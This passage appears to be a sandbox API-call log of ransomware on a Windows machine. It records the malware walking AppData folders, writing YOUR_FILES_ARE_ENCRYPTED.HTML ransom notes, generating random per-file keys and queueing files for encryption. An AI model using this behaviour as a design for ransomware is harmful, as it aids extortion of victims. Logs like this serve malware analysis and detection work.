ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 0 [0111.073] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.073] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0111.073] GetProcessHeap () returned 0x600000 [0111.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\installagent\\checkpoints\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.074] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.075] CloseHandle (hObject=0x32c) returned 1 [0111.075] GetProcessHeap () returned 0x600000 [0111.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.075] GetProcessHeap () returned 0x600000 [0111.075] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.076] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Checkpoints", cAlternateFileName="CHECKP~1")) returned 0 [0111.076] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0111.076] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0111.076] GetProcessHeap () returned 0x600000 [0111.076] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\installagent\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.093] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.094] CloseHandle (hObject=0x320) returned 1 [0111.094] GetProcessHeap () returned 0x600000 [0111.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.094] GetProcessHeap () returned 0x600000 [0111.094] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.095] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa72222b9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0111.096] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.096] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer") returned 67 [0111.096] GetProcessHeap () returned 0x600000 [0111.096] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.096] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer" [0111.097] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\*" [0111.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7440614, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.097] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7440614, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.097] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4302da2a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4302da2a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x430ec4ba, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19b3, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0111.097] StrStrIW (lpFirst="brndlog.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.097] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 79 [0111.097] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0111.097] lstrlenW (lpString=".txt") returned 4 [0111.097] PathFindExtensionW (pszPath="brndlog.txt") returned=".txt" [0111.097] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0111.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0111.097] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=6579) returned 1 [0111.097] GetProcessHeap () returned 0x600000 [0111.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.100] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="E7") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="2C") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="71") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="0C") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="8C") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="CA") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="D8") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="4A") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="A1") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="13") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="1A") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="2A") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="03") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="32") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="A4") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="AC") returned 2 [0111.100] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="2B") returned 2 [0111.100] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="40") returned 2 [0111.100] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="04") returned 2 [0111.100] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="0F") returned 2 [0111.100] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="D0") returned 2 [0111.100] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="4E") returned 2 [0111.100] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="D6") returned 2 [0111.100] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="C7") returned 2 [0111.100] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="E3") returned 2 [0111.100] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="97") returned 2 [0111.100] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="57") returned 2 [0111.100] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="81") returned 2 [0111.100] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="CD") returned 2 [0111.100] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="C4") returned 2 [0111.100] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="B9") returned 2 [0111.100] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="4D") returned 2 [0111.101] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" [0111.101] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.101] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.101] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72222b9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa72222b9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="DomainSuggestions", cAlternateFileName="DOMAIN~1")) returned 1 [0111.101] StrStrIW (lpFirst="DomainSuggestions", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.101] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions") returned 85 [0111.101] GetProcessHeap () returned 0x600000 [0111.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.102] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions" [0111.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\*" [0111.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72222b9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa72297d0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0111.102] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72222b9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa72222b9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa72297d0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="..", cAlternateFileName="")) returned 1 [0111.102] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa72297d0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa72297d0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa721c0f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4700, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="en-US.1", cAlternateFileName="")) returned 1 [0111.102] StrStrIW (lpFirst="en-US.1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.102] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.1") returned 93 [0111.102] PathFindExtensionW (pszPath="en-US.1") returned=".1" [0111.102] lstrlenW (lpString=".1") returned 2 [0111.102] PathFindExtensionW (pszPath="en-US.1") returned=".1" [0111.102] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa72297d0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa72297d0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa721c0f6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4700, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="en-US.1", cAlternateFileName="")) returned 0 [0111.102] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0111.102] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0111.102] GetProcessHeap () returned 0x600000 [0111.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\DomainSuggestions\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\domainsuggestions\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.103] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.105] CloseHandle (hObject=0x31c) returned 1 [0111.105] GetProcessHeap () returned 0x600000 [0111.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.105] GetProcessHeap () returned 0x600000 [0111.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.106] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x51125457, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x51128f00, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x51128f00, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="EmieSiteList", cAlternateFileName="EMIESI~1")) returned 1 [0111.106] StrStrIW (lpFirst="EmieSiteList", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.106] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList") returned 80 [0111.106] GetProcessHeap () returned 0x600000 [0111.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.107] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList" [0111.107] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\*" [0111.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x51125457, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x51128f00, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x51128f00, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.107] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x51125457, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x51128f00, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x51128f00, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="..", cAlternateFileName="")) returned 1 [0111.107] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x51128f00, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x51128f00, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x51128f00, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0111.108] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.108] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\container.dat") returned 94 [0111.108] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.108] lstrlenW (lpString=".dat") returned 4 [0111.108] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.108] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\emiesitelist\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0111.108] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=0) returned 1 [0111.108] CloseHandle (hObject=0x310) returned 1 [0111.108] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x51128f00, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x51128f00, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x51128f00, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x261f199, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0111.108] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.108] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0111.108] GetProcessHeap () returned 0x600000 [0111.108] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieSiteList\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\emiesitelist\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.109] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.110] CloseHandle (hObject=0x31c) returned 1 [0111.110] GetProcessHeap () returned 0x600000 [0111.110] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.110] GetProcessHeap () returned 0x600000 [0111.110] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.110] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5112b602, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5112dcfe, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5112dcfe, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="EmieUserList", cAlternateFileName="EMIEUS~1")) returned 1 [0111.110] StrStrIW (lpFirst="EmieUserList", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.110] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\EmieUserList") returned 80 [0111.110] GetProcessHeap () returned 0x600000 